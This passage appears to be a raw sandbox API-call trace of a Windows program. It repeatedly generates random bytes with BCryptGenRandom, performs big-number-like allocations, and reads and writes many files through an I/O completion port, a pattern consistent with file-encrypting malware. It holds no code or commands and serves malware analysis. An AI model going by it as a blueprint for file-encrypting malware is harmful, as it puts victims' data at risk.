lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0097.673] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0097.674] CloseHandle (hObject=0x1194) returned 1 [0097.675] free (_Block=0x3d70048) [0097.675] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0097.841] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0097.844] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0097.844] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0097.844] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0097.847] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0097.847] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0097.847] calloc (_Count=0x40, _Size=0x4) returned 0x77d8d0 [0097.847] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0097.847] free (_Block=0x77d8d0) [0097.847] calloc (_Count=0x41, _Size=0x4) returned 0x77d8d0 [0097.847] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0097.848] free (_Block=0x77d8d0) [0097.848] free (_Block=0x2071928) [0097.848] free (_Block=0x2071818) [0097.848] WriteFile (in: hFile=0x3b4, lpBuffer=0x3ef003c, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0097.848] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0098.027] WriteFile (in: hFile=0x3b0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x78f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0098.889] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0099.736] ReadFile (in: hFile=0x3b4, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x712e, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0100.072] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0100.085] CloseHandle (hObject=0x3b4) returned 1 [0100.088] free (_Block=0x3ef0008) [0100.088] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0100.102] ReadFile (in: hFile=0x3b0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x851c, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0100.103] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0100.116] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0100.119] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0100.119] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0100.119] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0100.121] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0100.121] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0100.121] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0100.122] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0100.122] free (_Block=0x77d800) [0100.122] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0100.122] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0100.122] free (_Block=0x2071818) [0100.122] free (_Block=0x2071928) [0100.122] free (_Block=0x77d908) [0100.122] WriteFile (in: hFile=0x3b4, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0100.123] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0100.141] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0100.144] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0100.144] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0100.144] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0100.146] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0100.146] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0100.146] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0100.146] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0100.146] free (_Block=0x77d800) [0100.146] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0100.146] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0100.147] free (_Block=0x2071818) [0100.147] free (_Block=0x2071928) [0100.147] free (_Block=0x77d908) [0100.147] WriteFile (in: hFile=0x1194, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x615, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0100.147] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0100.154] WriteFile (in: hFile=0x3b4, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x7da0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0100.154] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0100.155] WriteFile (in: hFile=0x1194, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x9a60, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0100.155] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0100.256] ReadFile (in: hFile=0x3b0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x745e, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0100.431] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0100.477] ReadFile (in: hFile=0x3b4, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0100.481] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0100.484] CloseHandle (hObject=0x3b4) returned 1 [0100.497] free (_Block=0x3d70048) [0100.497] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0100.561] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0100.569] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0100.569] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0100.569] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0100.571] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0100.571] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0100.574] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0100.574] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0100.574] free (_Block=0x77d800) [0100.574] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0100.574] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0100.575] free (_Block=0x2071818) [0100.575] free (_Block=0x2071928) [0100.575] free (_Block=0x77d908) [0100.575] WriteFile (in: hFile=0x334, lpBuffer=0x3db00ec*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8) returned 1 [0100.575] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0100.577] WriteFile (in: hFile=0x334, lpBuffer=0x3db00ec*, nNumberOfBytesToWrite=0x3a20, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8) returned 1 [0100.577] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0100.638] ReadFile (in: hFile=0x13e4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x2340, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0100.678] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0100.720] ReadFile (in: hFile=0x13e4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x1c30, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0100.721] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0100.721] CloseHandle (hObject=0x13e4) returned 1 [0100.724] free (_Block=0x1ff1e60) [0100.724] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0100.744] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0100.747] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0100.747] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0100.747] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0100.750] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0100.751] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0100.751] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0100.751] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0100.751] free (_Block=0x77d800) [0100.751] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0100.751] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0100.752] free (_Block=0x2071818) [0100.752] free (_Block=0x2071928) [0100.752] free (_Block=0x77d908) [0100.752] WriteFile (in: hFile=0x13e4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x617, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0100.752] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0100.766] WriteFile (in: hFile=0x13e4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x3a20, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0100.766] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0100.790] ReadFile (in: hFile=0x13e4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x1a1c, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0100.790] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0100.791] CloseHandle (hObject=0x13e4) returned 1 [0100.792] free (_Block=0x1ff1e60) [0100.792] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0100.807] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0100.810] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0100.810] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0100.810] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0100.814] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0100.814] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0100.814] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0100.814] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0100.814] free (_Block=0x77d800) [0100.814] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0100.814] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0100.815] free (_Block=0x2071818) [0100.815] free (_Block=0x2071928) [0100.815] free (_Block=0x77d908) [0100.815] WriteFile (in: hFile=0x13e4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61d, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0100.815] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0100.816] WriteFile (in: hFile=0x13e4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xcc0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0100.816] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0100.889] ReadFile (in: hFile=0x13e4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x1fa1, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0100.933] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0100.962] ReadFile (in: hFile=0x3b4, lpBuffer=0x3db00ec, nNumberOfBytesToRead=0x205, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db00b8) returned 1 [0100.962] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0100.969] WriteFile (in: hFile=0x1194, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x1e10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0100.969] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0101.014] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.017] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.017] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0101.017] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.020] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.020] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0101.025] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0101.025] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0101.025] free (_Block=0x77d800) [0101.025] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0101.025] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0101.026] free (_Block=0x2071818) [0101.026] free (_Block=0x2071928) [0101.026] free (_Block=0x77d908) [0101.026] WriteFile (in: hFile=0x13e0, lpBuffer=0x3e301cc*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e30198 | out: lpBuffer=0x3e301cc*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e30198) returned 1 [0101.026] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0101.381] WriteFile (in: hFile=0x334, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x2970, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0101.381] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0101.385] WriteFile (in: hFile=0xa54, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x3bd0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0101.385] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0101.532] ReadFile (in: hFile=0xcac, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x13a6, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 0x0 [0101.541] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0101.557] WriteFile (in: hFile=0xcb0, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x480, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0101.557] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0101.585] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.587] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.587] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0101.587] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0101.588] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0101.588] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0101.592] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0101.592] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0101.592] free (_Block=0x77d800) [0101.592] calloc (_Count=0x41, _Size=0x4) returned 0x2071818 [0101.592] calloc (_Count=0x82, _Size=0x4) returned 0x2071928 [0101.593] free (_Block=0x2071818) [0101.593] free (_Block=0x2071928) [0101.593] free (_Block=0x77d908) [0101.593] WriteFile (in: hFile=0xca0, lpBuffer=0x3e700ac*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70078 | out: lpBuffer=0x3e700ac*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70078) returned 1 [0101.593] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0101.601] WriteFile (in: hFile=0xcb4, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x1da0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0101.601] 